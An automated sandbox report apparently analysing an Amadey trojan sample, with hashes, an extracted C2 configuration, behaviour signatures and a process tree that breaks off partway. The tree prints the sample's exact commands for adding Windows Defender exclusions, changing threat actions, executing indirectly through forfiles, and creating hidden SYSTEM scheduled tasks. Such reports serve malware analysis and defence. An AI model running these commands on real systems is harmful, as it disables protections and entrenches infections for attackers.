Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/08/2024, 20:04

General

  • Target

    fbb957b3e36ba1dda0b65986117fd8555041d747810a100b47da4a90a1dfd693.exe

  • Size

    1.1MB

  • MD5

    7adfc6a2e7a5daa59d291b6e434a59f3

  • SHA1

    e21ef8be7b78912bed36121404270e5597a3fe25

  • SHA256

    fbb957b3e36ba1dda0b65986117fd8555041d747810a100b47da4a90a1dfd693

  • SHA512

    30f56bd75fe83e8fb60a816c1a0322bc686863d7ab17a763fff977a88f5582c356b4fcfe7c0c9e3e5925bfee7fc44e4ea8b96f82a011ed5e7cd236253187181b

  • SSDEEP

    24576:RvqqvYZAFnc7EtexlphsFHMQSuRoEPmXG1YO:8qvOA1jexlDsoAmXKYO

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

a51500

C2

http://api.garageserviceoperation.com

Attributes
  • install_dir

    0cf505a27f

  • install_file

    ednfovi.exe

  • strings_key

    0044a8b8e295529eaf3743c9bc3171d2

  • url_paths

    /CoreOPT/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 11 IoCs
  • Executes dropped EXE 18 IoCs
  • Indirect Command Execution 1 TTPs 29 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
  • Drops file in System32 directory 31 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3388
      • C:\Users\Admin\AppData\Local\Temp\fbb957b3e36ba1dda0b65986117fd8555041d747810a100b47da4a90a1dfd693.exe
        "C:\Users\Admin\AppData\Local\Temp\fbb957b3e36ba1dda0b65986117fd8555041d747810a100b47da4a90a1dfd693.exe"
        2⤵
        • Checks computer location settings
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1688
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1364
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4404
          • C:\Windows\SysWOW64\findstr.exe
            findstr /I "wrsa.exe opssvc.exe"
            4⤵
              PID:3928
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              4⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:1236
            • C:\Windows\SysWOW64\findstr.exe
              findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2232
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c md 40365
              4⤵
                PID:3200
              • C:\Windows\SysWOW64\findstr.exe
                findstr /V "HopeBuildersGeniusIslam" Sonic
                4⤵
                  PID:1836
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s
                  4⤵
                    PID:1872
                  • C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif
                    Beijing.pif s
                    4⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of WriteProcessMemory
                    PID:4476
                    • C:\Users\Admin\AppData\Local\Temp\1000047001\ufileee.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000047001\ufileee.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:4360
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                        6⤵
                        • Drops startup file
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4516
                        • C:\Users\Admin\Pictures\4nwtPYOhc4rfUChs6Y4nKBrb.exe
                          "C:\Users\Admin\Pictures\4nwtPYOhc4rfUChs6Y4nKBrb.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:4044
                        • C:\Users\Admin\Pictures\qeLaau3BHd2IlyvUxY2Rzl8O.exe
                          "C:\Users\Admin\Pictures\qeLaau3BHd2IlyvUxY2Rzl8O.exe"
                          7⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          PID:5112
                          • C:\Users\Admin\AppData\Local\Temp\7zS2D16.tmp\Install.exe
                            .\Install.exe
                            8⤵
                            • Executes dropped EXE
                            PID:2940
                            • C:\Users\Admin\AppData\Local\Temp\7zS3062.tmp\Install.exe
                              .\Install.exe /nmRdidbFR "385121" /S
                              9⤵
                              • Checks BIOS information in registry
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Enumerates system info in registry
                              PID:3620
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                10⤵
                                  PID:3864
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                    11⤵
                                    • Indirect Command Execution
                                    PID:2128
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                      12⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4432
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                        13⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4736
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                    11⤵
                                    • Indirect Command Execution
                                    PID:1956
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                      12⤵
                                        PID:4896
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                          13⤵
                                            PID:4624
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                        11⤵
                                        • Indirect Command Execution
                                        PID:1668
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                          12⤵
                                            PID:4080
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                              13⤵
                                                PID:1344
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                            11⤵
                                            • Indirect Command Execution
                                            PID:2496
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                              12⤵
                                                PID:1884
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                  13⤵
                                                    PID:4740
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                11⤵
                                                • Indirect Command Execution
                                                PID:4916
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                  12⤵
                                                    PID:3408
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                      13⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3648
                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                        14⤵
                                                          PID:1852
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                  10⤵
                                                  • Indirect Command Execution
                                                  PID:1536
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                    11⤵
                                                      PID:3960
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                        12⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2412
                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                          13⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3228
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "btVOVxCLuTmPtbGSGJ" /SC once /ST 20:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS3062.tmp\Install.exe\" pU /FqedidXuiZ 385121 /S" /V1 /F
                                                    10⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1480
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 976
                                                    10⤵
                                                    • Program crash
                                                    PID:3636
                                        • C:\Users\Admin\AppData\Local\Temp\1000048001\2.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000048001\2.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:1548
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                            6⤵
                                            • Drops startup file
                                            • System Location Discovery: System Language Discovery
                                            PID:1348
                                            • C:\Users\Admin\Pictures\aDp7OOhyCTh4vgleGvfjY9Sp.exe
                                              "C:\Users\Admin\Pictures\aDp7OOhyCTh4vgleGvfjY9Sp.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:4920
                                              • C:\Users\Admin\AppData\Local\Temp\7zSCCD1.tmp\Install.exe
                                                .\Install.exe
                                                8⤵
                                                • Executes dropped EXE
                                                PID:3420
                                                • C:\Users\Admin\AppData\Local\Temp\7zSD04B.tmp\Install.exe
                                                  .\Install.exe /nmRdidbFR "385121" /S
                                                  9⤵
                                                  • Checks BIOS information in registry
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Enumerates system info in registry
                                                  PID:4264
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                    10⤵
                                                      PID:868
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                        11⤵
                                                        • Indirect Command Execution
                                                        PID:1236
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                          12⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4908
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                            13⤵
                                                              PID:2672
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                          11⤵
                                                          • Indirect Command Execution
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3696
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                            12⤵
                                                              PID:3208
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                13⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4112
                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                            11⤵
                                                            • Indirect Command Execution
                                                            PID:732
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                              12⤵
                                                                PID:1788
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                  13⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:4172
                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                              11⤵
                                                              • Indirect Command Execution
                                                              PID:2744
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                12⤵
                                                                  PID:2072
                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    13⤵
                                                                      PID:5072
                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                  11⤵
                                                                  • Indirect Command Execution
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2620
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                    12⤵
                                                                      PID:1804
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                        13⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:316
                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                          14⤵
                                                                            PID:1220
                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                    10⤵
                                                                    • Indirect Command Execution
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1648
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                      11⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3984
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                        12⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        PID:3644
                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                          13⤵
                                                                            PID:2028
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /CREATE /TN "btVOVxCLuTmPtbGSGJ" /SC once /ST 20:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD04B.tmp\Install.exe\" pU /vPCdidcZWv 385121 /S" /V1 /F
                                                                      10⤵
                                                                      • Drops file in Windows directory
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:212
                                                              • C:\Users\Admin\Pictures\ana1uda4RuEP8ICKXPsBxYwc.exe
                                                                "C:\Users\Admin\Pictures\ana1uda4RuEP8ICKXPsBxYwc.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:3280
                                                          • C:\Users\Admin\AppData\Local\Temp\1000049001\file3333.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1000049001\file3333.exe"
                                                            5⤵
                                                            • UAC bypass
                                                            • Windows security bypass
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            • Windows security modification
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of SetThreadContext
                                                            • System policy modification
                                                            PID:4232
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000049001\file3333.exe" -Force
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2744
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                              6⤵
                                                              • Drops startup file
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:648
                                                              • C:\Users\Admin\Pictures\WgXsRmUC9JGtumlHx2cixKxr.exe
                                                                "C:\Users\Admin\Pictures\WgXsRmUC9JGtumlHx2cixKxr.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:1872
                                                              • C:\Users\Admin\Pictures\Of9D35jggfHZg0z9nEaMU1qg.exe
                                                                "C:\Users\Admin\Pictures\Of9D35jggfHZg0z9nEaMU1qg.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3960
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS5FBF.tmp\Install.exe
                                                                  .\Install.exe
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:4904
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS6220.tmp\Install.exe
                                                                    .\Install.exe /nmRdidbFR "385121" /S
                                                                    9⤵
                                                                    • Checks BIOS information in registry
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Enumerates system info in registry
                                                                    PID:3144
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                      10⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3368
                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                        11⤵
                                                                        • Indirect Command Execution
                                                                        PID:1480
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                          12⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:1924
                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                            13⤵
                                                                              PID:4964
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                          11⤵
                                                                          • Indirect Command Execution
                                                                          PID:2472
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                            12⤵
                                                                              PID:392
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                13⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:4672
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                            11⤵
                                                                            • Indirect Command Execution
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3616
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                              12⤵
                                                                                PID:1440
                                                                                • \??\c:\windows\SysWOW64\reg.exe
